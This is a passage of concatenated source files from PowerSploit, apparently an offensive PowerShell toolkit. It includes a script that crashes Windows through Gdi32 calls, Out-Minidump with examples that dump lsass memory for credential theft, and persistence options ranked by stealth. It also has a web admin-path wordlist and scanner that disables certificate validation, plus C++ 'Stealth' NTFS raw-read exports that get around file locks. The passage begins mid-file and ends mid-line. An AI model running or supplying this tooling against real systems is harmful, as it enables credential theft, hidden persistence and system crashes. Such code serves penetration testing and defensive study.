Static', 52 | 'Standard', 53 | [UInt32], 54 | @([IntPtr], [UInt32]), 55 | 'Winapi', 56 | 'Auto' ) | Out-Null 57 | 58 | $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx', 59 | 'Gdi32.dll', 60 | 'Public, Static', 61 | 'Standard', 62 | [Bool], 
63 | @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]), 64 | 'Winapi', 65 | 'Auto' ) | Out-Null 66 | 67 | $Gdi32 = $TypeBuilder.CreateType() 68 | } 69 | 70 | $LAYOUT_RTL = 1 71 | 72 | if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' )) 73 | { 74 | $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero) 75 | $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null 76 | $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 
38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | 46 | [Dd]ebug/ 47 | [Rr]elease/ 48 | build/ 49 | [Bb]in/ 50 | [Oo]bj/ 51 | 52 | # MSTest test Results 53 | [Tt]est[Rr]esult*/ 54 | [Bb]uild[Ll]og.* 55 | 56 | *_i.c 57 | *_p.c 58 | *.ilk 59 | *.meta 60 | *.obj 61 | *.pch 62 | *.pdb 63 | *.pgc 64 | *.pgd 65 | *.rsp 66 | *.sbr 67 | *.tlb 68 | *.tli 69 | *.tlh 70 | *.tmp 71 | *.tmp_proj 72 | *.log 73 | *.vspscc 74 | *.vssscc 75 | .builds 76 | *.pidb 77 | *.log 78 | *.scc 79 | 80 | # Visual C++ cache files 81 | ipch/ 82 | *.aps 83 | *.ncb 84 | *.opensdf 85 | *.sdf 86 | *.cachefile 87 | 88 | # Visual Studio profiler 89 | *.psess 90 | *.vsp 91 | *.vspx 92 | 93 | # Guidance Automation Toolkit 94 | *.gpState 95 | 96 | # ReSharper is a .NET coding add-in 97 | _ReSharper*/ 98 | *.[Rr]e[Ss]harper 99 | 100 | # TeamCity is a build add-in 101 | _TeamCity* 102 | 103 | # DotCover is a Code Coverage Tool 104 | *.dotCover 105 | 106 | # NCrunch 107 | *.ncrunch* 108 | .*crunch*.local.xml 109 | 110 | # Installshield output folder 111 | [Ee]xpress/ 112 | 113 | # DocProject is a documentation generator add-in 114 | DocProject/buildhelp/ 115 | DocProject/Help/*.HxT 116 | DocProject/Help/*.HxC 117 | DocProject/Help/*.hhc 118 | DocProject/Help/*.hhk 119 | DocProject/Help/*.hhp 120 | DocProject/Help/Html2 121 | DocProject/Help/html 122 | 123 | # Click-Once directory 124 | publish/ 125 | 126 | # Publish Web Output 127 | *.Publish.xml 128 | *.pubxml 129 | 130 | # NuGet Packages Directory 131 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line 132 | #packages/ 133 | 134 | # Windows Azure Build Output 135 | csx 136 | *.build.csdef 137 | 138 | # Windows Store app package directory 139 | AppPackages/ 140 | 141 | # Others 142 | sql/ 143 | *.Cache 144 | ClientBin/ 145 | [Ss]tyle[Cc]op.* 146 | ~$* 147 | *~ 148 | *.dbmdl 149 | *.[Pp]ublish.xml 150 | *.pfx 151 | *.publishsettings 152 | 153 | # RIA/Silverlight projects 154 
| Generated_Code/ 155 | 156 | # Backup & report files from converting an old project file to a newer 157 | # Visual Studio version. Backup files are not needed, because we have git ;-) 158 | _UpgradeReport_Files/ 159 | Backup*/ 160 | UpgradeLog*.XML 161 | UpgradeLog*.htm 162 | 163 | # SQL Server files 164 | App_Data/*.mdf 165 | App_Data/*.ldf 166 | 167 | ############# 168 | ## Windows detritus 169 | ############# 170 | 171 | # Windows image file caches 172 | Thumbs.db 173 | ehthumbs.db 174 | 175 | # Folder config file 176 | Desktop.ini 177 | 178 | # Recycle Bin used on file shares 179 | $RECYCLE.BIN/ 180 | 181 | # Mac crap 182 | .DS_Store 183 | 184 | 185 | ############# 186 | ## Python 187 | ############# 188 | 189 | *.py[co] 190 | 191 | # Packages 192 | *.egg 193 | *.egg-info 194 | dist/ 195 | build/ 196 | eggs/ 197 | parts/ 198 | var/ 199 | sdist/ 200 | develop-eggs/ 201 | .installed.cfg 202 | 203 | # Installer logs 204 | pip-log.txt 205 | 206 | # Unit test / coverage reports 207 | .coverage 208 | .tox 209 | 210 | #Translations 211 | *.mo 212 | 213 | #Mr Developer 214 | .mr.developer.cfg 215 | -------------------------------------------------------------------------------- /PowerSploit.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'PowerSploit.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '6753b496-d842-40a3-924a-0f09e248640c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Root Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 
49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @( @{ModuleName = 'PowerSploit'; ModuleVersion = '1.0.0.0'; GUID = '6753b496-d842-40a3-924a-0f09e248640c'}, 74 | @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}, 75 | @{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}, 76 | @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, 77 | @{ModuleName = 'PETools'; ModuleVersion = '1.0.0.0'; GUID = 'd15059e2-8bd9-47ff-8bcd-b708ff90e402'}, 78 | @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, 79 | @{ModuleName = 'ReverseEngineering'; ModuleVersion = '1.0.0.0'; GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff'}, 80 | @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, 81 | @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'} 82 | @{ModuleName = 'Capstone'; ModuleVersion = '1.0.0.0'; GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b'} 83 | ) 84 | 85 | # List of all files packaged with this module 86 | FileList = 'PowerSploit.psd1', 'PowerSploit.psm1' 87 | 88 | # Private data to pass 
to the module specified in RootModule/ModuleToProcess 89 | # PrivateData = '' 90 | 91 | # HelpInfo URI of this module 92 | # HelpInfoURI = '' 93 | 94 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 95 | # DefaultCommandPrefix = '' 96 | 97 | } 98 | -------------------------------------------------------------------------------- /Recon/Dictionaries/admin.txt: -------------------------------------------------------------------------------- 1 | admin1.php 2 | admin.asp 3 | admin/account.asp 4 | admin/account.html 5 | admin/account.php 6 | admin/controlpanel.asp 7 | admin/controlpanel.html 8 | admin/controlpanel.php 9 | admin/cp.asp 10 | admin/cp.html 11 | admin/cp.php 12 | admin/home.asp 13 | admin/home.php 14 | admin/index.asp 15 | admin/index.html 16 | admin/login.asp 17 | admin/login.html 18 | admin/login.php 19 | admin1.asp 20 | admin1.html 21 | admin1/ 22 | admin2.asp 23 | admin2.html 24 | admin2.php 25 | admin4_account/ 26 | admin4_colon/ 27 | admincontrol.asp 28 | admincontrol.html 29 | admincontrol.php 30 | administer/ 31 | administr8.asp 32 | administr8.html 33 | administr8.php 34 | administr8/ 35 | administracao.php 36 | administracao/ 37 | administracion.php 38 | administracion/ 39 | administrateur.php 40 | administrateur/ 41 | administratie/ 42 | administration.html 43 | administration.php 44 | administration/ 45 | administrator.asp 46 | administrator.html 47 | administrator.php 48 | administrator/account.asp 49 | administrator/account.html 50 | administrator/account.php 51 | administrator/index.asp 52 | administrator/index.html 53 | administrator/index.php 54 | administrator/login.asp 55 | administrator/login.html 56 | administrator/login.php 57 | administratoraccounts/ 58 | administrators/ 59 | administrivia/ 60 | adminpanel.asp 61 | adminpanel.html 62 | adminpanel.php 63 | adminpro/ 64 | admins.asp 65 | admins.html 66 | admins.php 67 | admins/ 68 | AdminTools/ 69 | amministratore.php 70 
| amministratore/ 71 | autologin/ 72 | banneradmin/ 73 | bbadmin/ 74 | beheerder.php 75 | beheerder/ 76 | bigadmin/ 77 | blogindex/ 78 | cadmins/ 79 | ccms/ 80 | ccms/index.php 81 | ccms/login.php 82 | ccp14admin/ 83 | cmsadmin/ 84 | configuration/ 85 | configure/ 86 | controlpanel.asp 87 | controlpanel.html 88 | controlpanel.php 89 | controlpanel/ 90 | cp.asp 91 | cp.html 92 | cp.php 93 | cpanel_file/ 94 | customer_login/ 95 | database_administration/ 96 | Database_Administration/ 97 | dir-login/ 98 | directadmin/ 99 | ezsqliteadmin/ 100 | fileadmin.asp 101 | fileadmin.html 102 | fileadmin.php 103 | formslogin/ 104 | globes_admin/ 105 | hpwebjetadmin/ 106 | Indy_admin/ 107 | irc-macadmin/ 108 | LiveUser_Admin/ 109 | login_db/ 110 | login-redirect/ 111 | login-us/ 112 | login.asp 113 | login.html 114 | login.php 115 | login1/ 116 | loginflat/ 117 | logo_sysadmin/ 118 | Lotus_Domino_Admin/ 119 | macadmin/ 120 | maintenance/ 121 | manuallogin/ 122 | memlogin/ 123 | meta_login/ 124 | modelsearch/login.asp 125 | modelsearch/login.php 126 | moderator.asp 127 | moderator.html 128 | moderator.php 129 | moderator/ 130 | moderator/admin.asp 131 | moderator/admin.html 132 | moderator/admin.php 133 | moderator/login.asp 134 | moderator/login.html 135 | moderator/login.php 136 | myadmin/ 137 | navSiteAdmin/ 138 | newsadmin/ 139 | openvpnadmin/ 140 | painel/ 141 | panel/ 142 | pgadmin/ 143 | phpldapadmin/ 144 | phppgadmin/ 145 | phpSQLiteAdmin/ 146 | platz_login/ 147 | power_user/ 148 | project-admins/ 149 | pureadmin/ 150 | radmind-1/ 151 | radmind/ 152 | rcLogin/ 153 | server_admin_small/ 154 | Server.asp 155 | Server.html 156 | Server.php 157 | ServerAdministrator/ 158 | showlogin/ 159 | simpleLogin/ 160 | smblogin/ 161 | sql-admin/ 162 | ss_vms_admin_sm/ 163 | sshadmin/ 164 | staradmin/ 165 | sub-login/ 166 | Super-Admin/ 167 | support_login/ 168 | sys-admin/ 169 | sysadmin.asp 170 | sysadmin.html 171 | sysadmin.php 172 | sysadmin/ 173 | SysAdmin/ 174 | SysAdmin2/ 175 | 
sysadmins/ 176 | system_administration/ 177 | system-administration/ 178 | ur-admin.asp 179 | ur-admin.html 180 | ur-admin.php 181 | ur-admin/ 182 | useradmin/ 183 | UserLogin/ 184 | utility_login/ 185 | v2/painel/ 186 | vadmind/ 187 | vmailadmin/ 188 | webadmin.asp 189 | webadmin.html 190 | webadmin.php 191 | webmaster/ 192 | websvn/ 193 | wizmysqladmin/ 194 | wp-admin/ 195 | wp-login/ 196 | xlogin/ 197 | yonetici.asp 198 | yonetici.html 199 | yonetici.php 200 | yonetim.asp 201 | yonetim.html 202 | yonetim.php -------------------------------------------------------------------------------- /Persistence/New-UserPersistenceOptions.ps1: -------------------------------------------------------------------------------- 1 | function New-UserPersistenceOptions 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Configure user-level persistence options for the Add-Persistence function. 7 | 8 | PowerSploit Function: New-UserPersistenceOptions 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | New-UserPersistenceOptions allows for the configuration of user-level persistence options. The output of this function is a required parameter of Add-Persistence. Available persistence options, in order of stealth, are the following: scheduled task, registry. 17 | 18 | .PARAMETER ScheduledTask 19 | 20 | Persist via a scheduled task. 21 | 22 | Detection Difficulty: Moderate 23 | Removal Difficulty: Moderate 24 | User Detectable? No 25 | 26 | .PARAMETER Registry 27 | 28 | Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. 29 | 30 | Detection Difficulty: Easy 31 | Removal Difficulty: Easy 32 | User Detectable? Yes 33 | 34 | .PARAMETER AtLogon 35 | 36 | Starts the payload upon any user logon. 37 | 38 | .PARAMETER OnIdle 39 | 40 | Starts the payload after one minute of idling. 
41 | 42 | .PARAMETER Daily 43 | 44 | Starts the payload daily. 45 | 46 | .PARAMETER At 47 | 48 | Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. 49 | 50 | .EXAMPLE 51 | 52 | C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon 53 | 54 | .EXAMPLE 55 | 56 | C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle 57 | 58 | .LINK 59 | 60 | http://www.exploit-monday.com 61 | #> 62 | 63 | [CmdletBinding()] Param ( 64 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 65 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 66 | [Switch] 67 | $ScheduledTask, 68 | 69 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 70 | [Switch] 71 | $Registry, 72 | 73 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 74 | [Switch] 75 | $Daily, 76 | 77 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 78 | [DateTime] 79 | $At, 80 | 81 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 82 | [Switch] 83 | $OnIdle, 84 | 85 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 86 | [Switch] 87 | $AtLogon 88 | ) 89 | 90 | $PersistenceOptionsTable = @{ 91 | Method = '' 92 | Trigger = '' 93 | Time = '' 94 | } 95 | 96 | switch ($PSCmdlet.ParameterSetName) 97 | { 98 | 'ScheduledTaskAtLogon' 99 | { 100 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 101 | $PersistenceOptionsTable['Trigger'] = 'AtLogon' 102 | } 103 | 104 | 'ScheduledTaskOnIdle' 105 | { 106 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 107 | $PersistenceOptionsTable['Trigger'] = 'OnIdle' 108 | } 109 | 110 | 'ScheduledTaskDaily' 111 | { 112 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 113 | $PersistenceOptionsTable['Trigger'] = 'Daily' 114 | $PersistenceOptionsTable['Time'] = $At 115 | } 116 | 117 | 'Registry' 118 | { 119 | 
$PersistenceOptionsTable['Method'] = 'Registry' 120 | $PersistenceOptionsTable['Trigger'] = 'AtLogon' 121 | } 122 | } 123 | 124 | $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable 125 | $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions' 126 | 127 | Write-Output $PersistenceOptions 128 | } 129 | -------------------------------------------------------------------------------- /Exfiltration/Out-Minidump.ps1: -------------------------------------------------------------------------------- 1 | function Out-Minidump 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Generates a full-memory minidump of a process. 7 | 8 | PowerSploit Function: Out-Minidump 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-Minidump writes a process dump file with all process memory to disk. 17 | This is similar to running procdump.exe with the '-ma' switch. 18 | 19 | .PARAMETER Process 20 | 21 | Specifies the process for which a dump will be generated. The process object 22 | is obtained with Get-Process. 23 | 24 | .PARAMETER DumpFilePath 25 | 26 | Specifies the path where dump files will be written. By default, dump files 27 | are written to the current working directory. Dump file names take following 28 | form: processname_id.dmp 29 | 30 | .EXAMPLE 31 | 32 | Out-Minidump -Process (Get-Process -Id 4293) 33 | 34 | Description 35 | ----------- 36 | Generate a minidump for process ID 4293. 37 | 38 | .EXAMPLE 39 | 40 | Get-Process lsass | Out-Minidump 41 | 42 | Description 43 | ----------- 44 | Generate a minidump for the lsass process. Note: To dump lsass, you must be 45 | running from an elevated prompt. 46 | 47 | .EXAMPLE 48 | 49 | Get-Process | Out-Minidump -DumpFilePath C:\temp 50 | 51 | Description 52 | ----------- 53 | Generate a minidump of all running processes and save them to C:\temp. 
54 | 55 | .INPUTS 56 | 57 | System.Diagnostics.Process 58 | 59 | You can pipe a process object to Out-Minidump. 60 | 61 | .OUTPUTS 62 | 63 | System.IO.FileInfo 64 | 65 | .LINK 66 | 67 | http://www.exploit-monday.com/ 68 | #> 69 | 70 | [CmdletBinding()] 71 | Param ( 72 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] 73 | [System.Diagnostics.Process] 74 | $Process, 75 | 76 | [Parameter(Position = 1)] 77 | [ValidateScript({ Test-Path $_ })] 78 | [String] 79 | $DumpFilePath = $PWD 80 | ) 81 | 82 | BEGIN 83 | { 84 | $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') 85 | $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') 86 | $Flags = [Reflection.BindingFlags] 'NonPublic, Static' 87 | $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) 88 | $MiniDumpWithFullMemory = [UInt32] 2 89 | } 90 | 91 | PROCESS 92 | { 93 | $ProcessId = $Process.Id 94 | $ProcessName = $Process.Name 95 | $ProcessHandle = $Process.Handle 96 | $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" 97 | 98 | $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName 99 | 100 | $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) 101 | 102 | $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, 103 | $ProcessId, 104 | $FileStream.SafeFileHandle, 105 | $MiniDumpWithFullMemory, 106 | [IntPtr]::Zero, 107 | [IntPtr]::Zero, 108 | [IntPtr]::Zero)) 109 | 110 | $FileStream.Close() 111 | 112 | if (-not $Result) 113 | { 114 | $Exception = New-Object ComponentModel.Win32Exception 115 | $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" 116 | 117 | # Remove any partially written dump files. For example, a partial dump will be written 118 | # in the case when 32-bit PowerShell tries to dump a 64-bit process. 
119 | Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue 120 | 121 | throw $ExceptionMessage 122 | } 123 | else 124 | { 125 | Get-ChildItem $ProcessDumpPath 126 | } 127 | } 128 | 129 | END {} 130 | } 131 | -------------------------------------------------------------------------------- /Recon/Get-HttpStatus.ps1: -------------------------------------------------------------------------------- 1 | function Get-HttpStatus 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Returns the HTTP Status Codes and full URL for specified paths. 7 | 8 | PowerSploit Function: Get-HttpStatus 9 | Author: Chris Campbell (@obscuresec) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | A script to check for the existence of a path or file on a webserver. 17 | 18 | .PARAMETER Target 19 | 20 | Specifies the remote web host either by IP or hostname. 21 | 22 | .PARAMETER Path 23 | 24 | Specifies the path to the dictionary file containing the paths to test, one entry per line. 25 | 26 | .PARAMETER Port 27 | 28 | Specifies the port to connect to. Defaults to 443 when -UseSSL is given, otherwise to 80. 29 | 30 | .PARAMETER UseSSL 31 | 32 | Use an SSL connection. Note: when this switch is used, server certificate validation is disabled via a process-wide callback that is not restored when the function returns. 
33 | 34 | .EXAMPLE 35 | 36 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Where-Object { $_.Status -like '20*' } 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL 41 | 42 | .NOTES 43 | 44 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error 45 | 46 | .LINK 47 | 48 | http://obscuresecurity.blogspot.com 49 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html 50 | #> 51 | 52 | [CmdletBinding()] Param( 53 | [Parameter(Mandatory = $True)] 54 | [String] 55 | $Target, 56 | 57 | [String] 58 | [ValidateNotNullOrEmpty()] 59 | $Path = '.\Dictionaries\admin.txt', 60 | 61 | [Int] 62 | $Port, 63 | 64 | [Switch] 65 | $UseSSL 66 | ) 67 | 68 | if (Test-Path $Path) { 69 | 70 | if ($UseSSL -and $Port -eq 0) { 71 | # Default to 443 if SSL is specified but no port is specified 72 | $Port = 443 73 | } elseif ($Port -eq 0) { 74 | # Default to port 80 if no port is specified 75 | $Port = 80 76 | } 77 | 78 | $TcpConnection = New-Object System.Net.Sockets.TcpClient 79 | Write-Verbose "Path Test Succeeded - Testing Connectivity" 80 | 81 | try { 82 | # Validate that the host is listening before scanning 83 | $TcpConnection.Connect($Target, $Port) 84 | } catch { 85 | Write-Error "Connection Test Failed - Check Target" 86 | $Tcpconnection.Close() 87 | Return 88 | } 89 | 90 | $Tcpconnection.Close() 91 | } else { 92 | Write-Error "Path Test Failed - Check Dictionary Path" 93 | Return 94 | } 95 | 96 | if ($UseSSL) { 97 | $SSL = 's' 98 | # Ignore invalid SSL certificates. NOTE: ServicePointManager is process-wide and this callback is never reset, so certificate validation stays disabled for the rest of the PowerShell session. 99 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True } 100 | } else { 101 | $SSL = '' 102 | } 103 | 104 | if (($Port -eq 80) -or ($Port -eq 443)) { 105 | $PortNum = '' 106 | } else { 107 | $PortNum = ":$Port" 108 | } 109 | 110 | # Check Http status for each entry in the dictionary file 111 | foreach ($Item in Get-Content $Path) { 112 | 113 | 
$WebTarget = "http$($SSL)://$($Target)$($PortNum)/$($Item)" 114 | $URI = New-Object Uri($WebTarget) 115 | 116 | try { 117 | $WebRequest = [System.Net.WebRequest]::Create($URI) 118 | $WebResponse = $WebRequest.GetResponse() 119 | $WebStatus = $WebResponse.StatusCode 120 | $ResultObject += $ScanObject 121 | $WebResponse.Close() 122 | } catch { 123 | $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode 124 | 125 | if ($WebStatus -eq $null) { 126 | # Not every exception returns a StatusCode. 127 | # If that is the case, return the Status. 128 | $WebStatus = $Error[0].Exception.InnerException.Status 129 | } 130 | } 131 | 132 | $Result = @{ Status = $WebStatus; 133 | URL = $WebTarget} 134 | 135 | $ScanObject = New-Object -TypeName PSObject -Property $Result 136 | 137 | Write-Output $ScanObject 138 | 139 | } 140 | } 141 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 
14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | #include "stdafx.h" 19 | #include "NTFS.h" 20 | #include "NTFS_DataType.h" 21 | 22 | using namespace std; 23 | 24 | struct FileInfo_t 25 | { 26 | CNTFSVolume* volume; 27 | CFileRecord* fileRecord; 28 | CIndexEntry* indexEntry; 29 | CAttrBase* data; 30 | }; 31 | 32 | extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr) 33 | { 34 | FileInfo_t* fileInfo = new FileInfo_t; 35 | 36 | string filePath = string(filePathCStr); 37 | _TCHAR volumeName = filePath.at(0); 38 | 39 | fileInfo->volume = new CNTFSVolume(volumeName); 40 | if (!fileInfo->volume->IsVolumeOK()) 41 | { 42 | return NULL; 43 | } 44 | 45 | //Parse root directory 46 | fileInfo->fileRecord = new CFileRecord(fileInfo->volume); 47 | fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION); 48 | 49 | if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT)) 50 | { 51 | return NULL; 52 | } 53 | if (!fileInfo->fileRecord->ParseAttrs()) 54 | { 55 | return NULL; 56 | } 57 | 58 | //Find subdirectory 59 | fileInfo->indexEntry = new CIndexEntry; 60 | int dirs = filePath.find(_T('\\'), 0); 61 | int dire = filePath.find(_T('\\'), dirs+1); 62 | 63 | while (dire != string::npos) 64 | { 65 | string pathname = filePath.substr(dirs+1, dire-dirs-1); 66 | const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str(); 67 | if (fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry))) 68 | { 69 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference())) 70 | { 71 | return NULL; 72 | } 73 | 74 | if (!fileInfo->fileRecord->ParseAttrs()) 75 | { 76 | if (fileInfo->fileRecord->IsCompressed()) 77 | { 78 | return NULL; 79 | } 80 | else if (fileInfo->fileRecord->IsEncrypted()) 81 | { 82 | return NULL; 83 | } 84 | else 85 | { 86 | return NULL; 87 | } 88 | } 89 | } 90 | else 91 | { 92 | return NULL; 93 | } 94 | 95 | 96 | dirs = dire; 97 | dire = 
filePath.find(_T('\\'), dirs+1); 98 | } 99 | 100 | string fileName = filePath.substr(dirs+1, filePath.size()-1); 101 | const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str(); 102 | if (fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry))) 103 | { 104 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference())) 105 | { 106 | return NULL; 107 | } 108 | 109 | fileInfo->fileRecord->SetAttrMask(MASK_DATA); 110 | if (!fileInfo->fileRecord->ParseAttrs()) 111 | { 112 | return NULL; 113 | } 114 | 115 | fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream(); 116 | 117 | return fileInfo; 118 | } 119 | 120 | return NULL; 121 | } 122 | 123 | 124 | extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining) 125 | { 126 | 127 | if (fileInfo->data) 128 | { 129 | ULONGLONG dataLength = (ULONGLONG)fileInfo->data->GetDataSize(); 130 | ULONGLONG fullDataLength = dataLength; 131 | 132 | dataLength = dataLength - offset; 133 | if (dataLength > bufferSize) 134 | { 135 | dataLength = bufferSize; 136 | } 137 | if (dataLength > MAXUINT32) 138 | { 139 | return 1; 140 | } 141 | 142 | DWORD len; 143 | if (fileInfo->data->ReadData(offset, buffer, dataLength, &len) && len == dataLength) 144 | { 145 | *bytesRead = len; 146 | *dataRemaining = fullDataLength - len - offset; 147 | return 0; //Success 148 | } 149 | return 3; 150 | } 151 | return 2; 152 | } 153 | 154 | 155 | extern "C" void __declspec(dllexport) 